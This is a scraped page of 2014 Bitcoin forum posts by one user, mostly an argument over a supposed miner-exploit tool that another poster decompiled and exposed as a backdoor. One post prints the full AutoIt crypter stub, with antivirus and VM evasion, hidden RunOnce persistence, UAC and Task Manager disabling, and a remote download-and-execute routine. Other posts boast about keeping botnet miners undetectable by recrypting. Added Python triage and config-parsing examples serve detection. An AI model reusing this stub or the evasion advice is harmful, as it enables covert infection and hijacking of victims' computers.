Showing 20 of 77 results by steve15
Post
Topic
Board Development & Technical Discussion
Re: Wallet.dat
by
steve15
on 08/02/2014, 16:43:55 UTC
Or just change your wallet. There are numerous better wallets out there!
Post
Topic
Board Development & Technical Discussion
Re: What does the wallet.dat file do?
by
steve15
on 08/02/2014, 16:29:23 UTC
The wallet.dat file is like your personal wallet in real life; it proves you own it.
Your real-life wallet has no data about who has what amount, right?

When you back up, you just need that file, nothing else. All the rest gets synced with the blockchain.
Post
Topic
Board Markt
Re: [WTS] 3x Antminer S1, shipping 8 February!
by
steve15
on 07/02/2014, 14:37:52 UTC
Wow, already 3x 40 amp in use, hmmm, that is either a gigantic mining farm or you have green fingers.

I am still amazed that people are willing to pay this premium when you can also just place an order with Bitmain yourself and pay at most 35€ in import duties and VAT, so 1.5 BTC total at most (1.45 BTC for the miner and at most 0.05 BTC import duties).

Good luck with your sale.

Regards

Hello,

I recently placed an impulsive order for 3 Antminer S1s. This order is complete, paid for, and ready to ship from tomorrow.
The problem is that I currently cannot connect another 1200W in my home; I am already at 94% of my circuit (3x40 amp).

Is anyone interested in taking these over? I will pay the import costs and then forward them immediately to the correct address.
Please send me a PM if interested.

The asking price (fixed) is 1.75 BTC, import and shipping costs included.

Regards




35€?? If customs doesn't stop your package, you mean.
Those are the shipping costs for DHL.

On my last order (20 units), I got to pay 325€ PER UNIT in import duties!!

Package held by customs, and valued at 2000€ per "computer"...
Post
Topic
Board Markt
Topic OP
[WTS] 3x Antminer S1, shipping 8 February!
by
steve15
on 07/02/2014, 12:43:18 UTC
Hallo,

I recently placed an impulsive order for 3 Antminer S1s. This order is complete, paid for, and ready to ship from tomorrow.
The problem is that I currently cannot connect another 1200W in my home; I am already at 94% of my circuit (3x40 amp).

Is anyone interested in taking these over? I will pay the import costs and then forward them immediately to the correct address.
Please send me a PM if interested.

The asking price (fixed) is 1.75 BTC, import and shipping costs included.

Regards


Post
Topic
Board Mining
Re: BitCoin mining virus
by
steve15
on 03/02/2014, 17:48:27 UTC
FUD indeed passes malware scans, but FUDs change all the time, so it's impossible for one virus to stay in your system for a longer time.
As soon as a file gets sent 2-3 times to VirusTotal the FUD is crushed.

So this is not as simple to spread as people think, but of course loads of machines are infected.

That's why the RAT client has the option "update server". If you recrypt every two days or so, and update all your bots with 3 mouse clicks, there is no need to worry about it...
Post
Topic
Board Mining
Re: BitCoin mining virus
by
steve15
on 03/02/2014, 16:56:03 UTC
Is there any way to detect this virus? One of the computers at my job suddenly has the CPU light on all day and is very slow. It's probably something else, but if there's a common way to check for this virus I'd like to know.
Check the task manager for high CPU usage. If it's poorly made it'll be there.
Also check the startup folder and the run registry keys, make sure nothing suspicious is there.
Scan with Malwarebytes, it should pick up anything you can't catch.

Hardly needs to be poorly made - it's not easy to fake the CPU usage, unless you install a rootkit. And even then the sound of your fans blazing is pretty much a dead giveaway.

https://www.google.be/search?q=silent+miner&ie=utf-8&oe=utf-8&rls=org.mozilla:nl:official&client=firefox-a&gws_rd=cr&ei=zcnvUrDkDenV4wTXq4GYAg#q=FUD+silent+miner&rls=org.mozilla:nl:official

There you go. Undetectable silent miners.

Blazing fans? In your dreams. A silent miner takes about 30% of your CPU usage.
Then again, with tens of thousands of silent miners in a simple botnet, there is no need for maximum CPU usage.
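The checklist in the reply above (task manager, Startup folder, Run keys) can be scripted. The Python below is an added example, not code from the thread or from any of the posters: it parses the text output of `reg query` on the Run/RunOnce keys and of `wmic process get ... /format:csv`, and flags entries that name a known mining binary, carry pool-style arguments, or are script launchers living under a user-writable path. The embedded sample output is constructed; the value name ppqzt, the file 85841.vbs and the lmsqQw.exe / HbDzt.MCM names are borrowed from the decompiled AutoIt stub posted later in this thread, and pool.example is a made-up pool address.

```python
import csv
import io
import re

# Heuristics for a hidden miner. A known mining binary or pool-style arguments
# is strong evidence on its own; a script launcher that lives under a
# user-writable path is the persistence pattern to look for in Run/RunOnce.
MINER_BINARIES = {"cgminer", "bfgminer", "minerd", "cpuminer", "sgminer", "xmrig"}
SCRIPT_HOSTS = {"wscript", "cscript", "mshta", "powershell"}
SCRIPT_EXTENSIONS = (".vbs", ".js", ".jse", ".cmd", ".bat", ".hta", ".ps1")
USER_WRITABLE = re.compile(
    r"(\\users\\[^\\]+\\|\\appdata\\|\\temp\\|%userprofile%|%appdata%|%temp%)", re.I)
POOL_ARGUMENTS = re.compile(r"(stratum\+tcp://|--url[= ]|(^|\s)-o\s|(^|\s)-u\s)", re.I)
STRONG = {"known mining binary", "mining-pool style arguments"}
PERSISTENCE = {"script launcher", "user-writable path"}
# One value line of `reg query` output: <name>  <REG_type>  <data>
REG_VALUE = re.compile(r"^\s{2,}(\S.*?)\s{2,}(REG_\w+)\s{2,}(.*)$")


def first_token(cmd):
    """The program part of a command line, honouring a quoted path with spaces."""
    cmd = cmd.strip()
    if not cmd:
        return ""
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0]
    return cmd.split()[0]


def indicators(cmd):
    """Every indicator that applies to one command line, in a fixed order."""
    exe = first_token(cmd).replace("/", "\\").rsplit("\\", 1)[-1].lower()
    stem = exe.rsplit(".", 1)[0]
    found = []
    if stem in MINER_BINARIES:
        found.append("known mining binary")
    if POOL_ARGUMENTS.search(cmd):
        found.append("mining-pool style arguments")
    if stem in SCRIPT_HOSTS or exe.endswith(SCRIPT_EXTENSIONS):
        found.append("script launcher")
    if USER_WRITABLE.search(cmd):
        found.append("user-writable path")
    return found


def is_suspicious(found):
    """Strong evidence alone, or the full persistence pattern, flags an entry."""
    found = set(found)
    return bool(found & STRONG) or PERSISTENCE <= found


def triage_reg_query(text):
    """Suspicious autorun values as (key, value name, data, indicators)."""
    hits, key = [], ""
    for line in text.splitlines():
        if line.startswith("HK"):
            key = line.strip()          # `reg query` prints the key path unindented
            continue
        m = REG_VALUE.match(line)
        if m:
            name, _type, data = m.groups()
            found = indicators(data)
            if is_suspicious(found):
                hits.append((key, name, data, found))
    return hits


def triage_wmic_csv(text):
    """Suspicious processes as (pid, name, command line, indicators)."""
    hits = []
    for row in csv.DictReader(io.StringIO(text.strip())):
        cmd = row.get("CommandLine") or ""
        found = indicators(cmd)
        if is_suspicious(found):
            hits.append((row.get("ProcessId"), row.get("Name"), cmd, found))
    return hits


# Constructed sample output (not captured from a real machine). The "ppqzt"
# value and the lmsqQw.exe / HbDzt.MCM names come from the AutoIt stub quoted
# later in this thread; pool.example is a made-up pool address.
SAMPLE_REG = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    ppqzt    REG_SZ    C:\Users\bob\ppqzt\85841.vbs

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""

SAMPLE_WMIC = r"""Node,CommandLine,Name,ProcessId
PC1,C:\Windows\Explorer.EXE,explorer.exe,1234
PC1,C:\Users\bob\ppqzt\lmsqQw.exe C:\Users\bob\ppqzt\HbDzt.MCM,lmsqQw.exe,2210
PC1,C:\Users\bob\AppData\Local\Temp\47211.exe -o stratum+tcp://pool.example:3333 -u wallet -p x,47211.exe,2288
"""


def main():
    for hit in triage_reg_query(SAMPLE_REG):
        print("AUTORUN", hit)
    for hit in triage_wmic_csv(SAMPLE_WMIC):
        print("PROCESS", hit)


if __name__ == "__main__":
    main()
```

Note what the sample does not catch: the renamed AutoIt runtime lmsqQw.exe running from the user profile trips only one indicator, so it is not flagged. Its tells are the +SHR attributes the stub sets on its files and the .MCM config sitting next to it, which a text-only triage of autoruns and command lines cannot see; that is the gap a file-system sweep of hidden files under the profile has to cover.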
Post
Topic
Board Mining
Re: BitCoin mining virus
by
steve15
on 03/02/2014, 16:40:24 UTC
Malware Bytes picks up every Bitcoin Miner I download, even though they are legitimate. I'm sure that it will pick up silent miners as well. Granted that they could have what was mentioned above, but AVs can pick stuff up and add it to the databases pretty fast.

Yes, because it is well known.

FUD crypters are using unique stubs, there are no two equal. Therefore, they are FUD.
You don't have to believe me, just google FUD crypters and virus. You'll see.

It's this kind of thinking that gets people hacked in the first place.

It's as foolish as thinking you need no AV on a Mac or Linux.
Post
Topic
Board Mining
Re: BitCoin mining virus
by
steve15
on 03/02/2014, 15:42:16 UTC
Well, I created a special tool to scan your network to see if your miners are being exploited remotely or not. This was built as a proof-of-concept tool to show a huge miner exploit.

Because of some script kiddies reverse engineering and decompiling the tool, and posting it on the topic with a fake antivirus link, linking to a Java drive-by exploit, I locked the topic and asked an admin to remove it.

You can still search the topic in the 'mining' section, called "KnC Miner : Security hacked - UPDATE with TOOL"

On topic:

The main problem is these viruses are NOT detected by your AV because they are crypted to be what's called FUD (Fully Undetectable).

They pay big bucks for those crypters to keep them always FUD. Never ever will an AV or Malwarebytes pick up a virus that has been 100% FUD crypted.

It only takes clicking a stupid link, like the one user ici_lemmy posted in my topic, to get infected. You can only know if you are infected or not by scanning whether your miners are being remotely viewed, or whether an instance of cgminer/bfgminer is running silently, fully hidden on your system.

Never be fooled by thinking "I have a good AV scanner, I'm safe", because you are NOT and never will be.

There are thousands of computers hooked up in botnets to mine without the users knowing it.
Post
Topic
Board Services
Re: Up to 0.01 BTC weekly for YOUR SIGNATURE
by
steve15
on 02/02/2014, 13:32:01 UTC
Alright, a couple of things went wrong here.

1: I made a typo claiming I've sent 0.9. This should be 0.09
2: All amounts smaller than 0.1 are considered 'donations', thus not being processed.

BITMIXER.IO claims they will process my payment, so if they do, I have to offer them my public apology.

Small advice to bitmixer.io: Make this more visible on your website BEFORE users send money.

This being said:

LEGIT SITE
Post
Topic
Board Service Announcements
Re: ✰ [ANN] BITMIXER.IO ✰ High Volume Bitcoin Mixer ✰
by
steve15
on 02/02/2014, 13:30:41 UTC
Alright, a couple of things went wrong here.

1: I made a typo claiming I've sent 0.9. This should be 0.09
2: All amounts smaller than 0.1 are considered 'donations', thus not being processed.

BITMIXER.IO claims they will process my payment, so if they do, I have to offer them my public apology.

Small advice to bitmixer.io: Make this more visible on your website BEFORE users send money.

This being said:

LEGIT SITE
Post
Topic
Board Service Announcements
Re: ✰ [ANN] BITMIXER.IO ✰ High Volume Bitcoin Mixer ✰
by
steve15
on 02/02/2014, 09:43:04 UTC
-
Post
Topic
Board Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by
steve15
on 01/02/2014, 11:37:22 UTC
Moderator please remove this topic

Source code of the project has been sold. I no longer support the application or its source in any way.
The buyer claims he will make the source public soon to prevent massive scale attacks.

Thank you.
Post
Topic
Board Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by
steve15
on 28/01/2014, 18:40:48 UTC
As I said, I have no more time to lose on that...
I'm absolutely sure that you are a script kiddie trying to infect computers, and I explained how to verify what I'm saying (quickly, I have to admit) so anybody skilled enough can check for himself...

Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more I can do...

Just explain why you upload a whole different file, containing more than 15 DLL files that are NOT in my file.
Explain why your upload contains a Remote Service Application, for example.

Your posts are worth nothing, dude. Get lost. And see my edits above in my last post.
Post
Topic
Board Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by
steve15
on 28/01/2014, 18:22:01 UTC
@steve15: I'm disappointed in myself because I have not exposed you earlier...

For the analysis, quick answer because I have no more time to lose on this...

OK, so here is my simple full process to expose the scam (so everyone with skills can do it):
- unrar the exe
- remove the commented AutoIt script lines
- modify the script in order to get the decrypted file (and remove the nasty things)
- send the decrypted file to VirusTotal

and here are the VirusTotal results:
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50

Conclusion: steve15 is not a professional pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me!

@admin: you should remove the link to the tool and ban steve

Edit: @Chancellor: there is no vulnerability except the API in cgminer, which is not actually a vulnerability


You really are an idiot, excuse my language.

Try this:

- Download whatever executable file online, for example the Firefox installer.
- Scan with VirusTotal = 0/50
- Disassemble the exe or rar
- Remove the commented lines
- Modify the script to have the contents of the installer
- Remove some lines
- Send the decrypted file to VirusTotal = bam, at least 40/50

Every single known executable file in VirusTotal that gets modified by even 1 bit will get an instant alert.
That is the main reason why you can't fake EXE file assembly without triggering an alert.

Also notice our hashes:

My hash: A5F3453E03DD2E4F356BEC7FB595B799A8EA6BE2C0466CE8550C74E247511870
Your hash: abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3

You scanned a "*.BIN" file. You could have uploaded WHATEVER file you wanted to upload.
The hash check is not the same, so it is not the same file, period. That's called faking results.

Your file contains at least 15 DLL files that are not even present in my code!

These are the files included:



Try this second method:

Create any .NET project
Google some UPnP / network scanning methods/modules/classes
Compile and send to VirusTotal = bam, 40/50

So please, you have no idea what you are talking about.
You also still failed to post the actual exploit code.

You post the source from the crypter ITSELF to scare people, but you also fail to post the configuration file for it, so they can see I'm not using ANY of these 'scary' functions.

At most, you can be considered a medium-skilled cracker, but that is where this story ends for you, ici_lemmy.
Cracking, hacking and decompiling is more than running some cracked tools you found on thepiratebay.
Post
Topic
Board Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by
steve15
on 28/01/2014, 18:11:08 UTC
Here are my beliefs
And what if...

1. You've discovered some minor vulnerability, which may only be exploited in extreme conditions, like a miner on a public IP.
2. You've made a fuss about it here.
3. You've prepared malicious software which, when run on a Windows machine on the same LAN as the miner, allows you to take control over the miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.

Bullshit? Maybe.

Impossible? Don't think so. Time will tell.

IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.


You are right about some parts.

1. If the vulnerability is minor, would KnC upgrade their firmware? It is not just the public-IP miners who are in danger.
2: If I prepared malicious software to take control over users' miners, would I really opt for an EXE file, you think?

Preparing malicious software and binding it in a simple PDF file, where I claim to describe the method, would be far more efficient for that purpose.

People are not suspicious about a PDF, and they need to open it anyway.
Post
Topic
Board Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by
steve15
on 28/01/2014, 16:19:55 UTC
Here are my beliefs

ici_lemmy does not even own mining equipment.

Because, instead of trying out whether his rigs are exploitable or not, he goes straight to decompiling all files.
Since he didn't make a single post in this thread before I posted my tool, I believe he was just waiting to try and exploit my tool in order to do nasty stuff with it.

Why else decompile before trying...

Dozens of PMs regarding this kind of "users" (I prefer the term hacker, but what's in a name...) are submitted to me by concerned miners.

For this reason, none of the exploit code can be found inside the main executables.
I also crypted the files to prevent a run while sniffers are active, or virtual environments are detected.
This was also posted by me before posting the tool.

As ici_lemmy himself posts, he is disappointed in himself. Why?
Because for the third time in a row he posts decompiled code that does... nothing at all!

This proves to me his eagerness to get to the core files to abuse them.

If I had a program that was as evil as he tries to picture it, I would have deleted it by now.
It also seems logical that some AV/AM/FW scanner would have picked it up by now.

So for the last and final time:

IF YOU ARE PLANNING ON ABUSING THE SOURCE.. GET LOST, YOU CAN'T.
IF YOU ARE PLANNING ON POSTING BULLSHIT FOR NOT BEING ABLE TO EXTRACT THE SOURCE.. GET LOST.
IF YOU WANT TO TEST YOUR MINING EQUIPMENT.. FEEL FREE TO DOWNLOAD AND TEST RUN and THEN POST YOUR FINDINGS.

I will no longer reply to any script kiddie out there trying to get hold of the source, tested, approved and verified by KnC itself, to start hacking some machines.

As stated before, this is the kind of behaviour that makes me want to keep all next exploits to myself instead of sharing them.
I would have been better off just mining with your rigs, smiling while reading your posts about it...

Thank you
Post
Topic
Board Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by
steve15
on 28/01/2014, 15:22:21 UTC
That was smart, to make us look the other way...
I'm disappointed in myself, I should have seen that earlier...
Code:
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf

Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "\mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc

Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc

Func fakemessage()
$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc

Func mutex()
$scriptname = "lmsqQw.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc

Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc

Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc

Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
$autoit3 = "lmsqQw.exe"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc

Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc

Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc

Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc

Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc

Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc

Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc

Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc

Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc

Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]

[SNIP]
-----------------
[SNIP]

Func loop()
While 1
If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc

Yeah, why should I bother running this in a VM?

Nice game OP... but you lose!

Are you kidding me or what? Did you really just post the crypter's source?!
What the hell has this to do with my source?
The source you just posted proves that none of the functions included, except the anti-virtual ones, are being used.

Quote
That was smart, to make us look the other way...
I'm disappointed in myself, I should have seen that earlier...

If you didn't even see that one, even after decompiling the executable, well, I'm sorry, but you're unskilled then.
Plus, if you followed the topic, I explicitly posted about crypting the source.

Now for the last time, stop spamming my topic. I've had enough of your makes-no-sense posts here.
If you really think you are all that mighty, then PM me as I asked you, and we'll compare our sources.

Then once again, you will be disappointed in yourself. For the third time in a row.

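steve15's defence above is that the crypter's feature functions only run when the stub's config file enables them, and the decompiled stub shows exactly that mechanism: each `IniRead` on HbDzt.MCM is compared with a trigger value before the corresponding function is called. The Python below is an added example, not ici_lemmy's or steve15's code: it extracts those gates from the stub source with a regular expression and reports which features a given config would switch on. The stub excerpt is copied from the decompiled code above; the INI contents are constructed, because the real HbDzt.MCM was never posted in the thread.

```python
import configparser
import re

# One gate in the stub: `Local $x = IniRead(<file>, "<section>", "<key>", "NotFound")`
# followed by `If $x = "<trigger>" Then` and the call to the feature function.
GATE = re.compile(
    r'Local \$(\w+) = IniRead\([^,]+,\s*"([^"]*)",\s*"([^"]*)",\s*"[^"]*"\)\s*\n'
    r'\s*If \$\1 = "([^"]*)" Then\s*\n'
    r'\s*(\w+)\(\)')

# What each feature function in the quoted stub does, read from its body above.
WHAT_IT_DOES = {
    "delay": "sleep loop that starts and kills mshta.exe",
    "mutex": "exit if another lmsqQw.exe instance is running",
    "startup": "RunOnce value plus hidden .vbs/.cmd launcher under the user profile",
    "antis": "exit when VboxService.exe / VMwaretray.exe are present",
    "fakemessage": "show a decoy MsgBox once",
    "botkiller": "wipe the Run keys and the Startup folder",
    "downloader": "InetGet a URL into the profile and execute it",
    "disable_uac": "set EnableLUA=0 under HKLM",
    "disable_syste_restore": "delete the SPP\\Clients key",
    "antitask": "set DisableTaskMgr=1 under HKCU",
}


def extract_gates(stub_source):
    """Map feature function -> (section, key, trigger value) from the stub source."""
    return {m.group(5): (m.group(2), m.group(3), m.group(4))
            for m in GATE.finditer(stub_source)}


def enabled_features(gates, ini_text):
    """Feature functions whose INI value equals the trigger, in stub order.
    Missing sections or keys behave like AutoIt's IniRead default ("NotFound")."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str                       # keep key names exactly as written
    cfg.read_string(ini_text)
    return [func for func, (section, key, trigger) in gates.items()
            if cfg.get(section, key, fallback="NotFound") == trigger]


def report(gates, ini_text):
    """(function, enabled?, description) for every gate, for one config."""
    on = set(enabled_features(gates, ini_text))
    return [(func, func in on, WHAT_IT_DOES.get(func, "?")) for func in gates]


# Constructed excerpt: the gate lines copied from the decompiled stub above
# (the file name HbDzt.MCM and the section/key/trigger values are the stub's).
# The full stub has more gates; these are enough for the demonstration.
STUB_EXCERPT = r'''
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
'''

# Constructed config: the real HbDzt.MCM was never posted in the thread.
SAMPLE_CONFIG = """
[6072607]
5726011=4140580
[1478845]
1729463=9293639
[9632628]
8921159=2314561
[uac1]
uac2=something-else
"""


def main():
    gates = extract_gates(STUB_EXCERPT)
    for func, on, what in report(gates, SAMPLE_CONFIG):
        print(f"{'ON ' if on else 'off'}  {func:<22} {what}")


if __name__ == "__main__":
    main()
```

Run it over the full stub and the real .MCM file and the argument is settled with data rather than assertions; with the constructed config only delay, mutex and antis come out enabled, while a key that is present but holds the wrong value (uac2 above) stays off, exactly as the stub's string comparison would leave it.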
Post
Topic
Board Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by
steve15
on 27/01/2014, 19:43:14 UTC
Alright, to keep this post on topic.

JUST TO BE CLEAR

Decompiling the executable, or the DLL file, will NOT give you what you are looking for.
These are only there to run the network scan.

AutoIt is used to execute the actual exploit, and to detect modifications, scanners, sniffers, decompilers, and virtual boxes.

If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.

USE THIS TOOL FOR WHAT IT HAS BEEN DESIGNED FOR!!

This tool is a PROOF OF CONCEPT about built-in exploits in most miner hardware rigs.

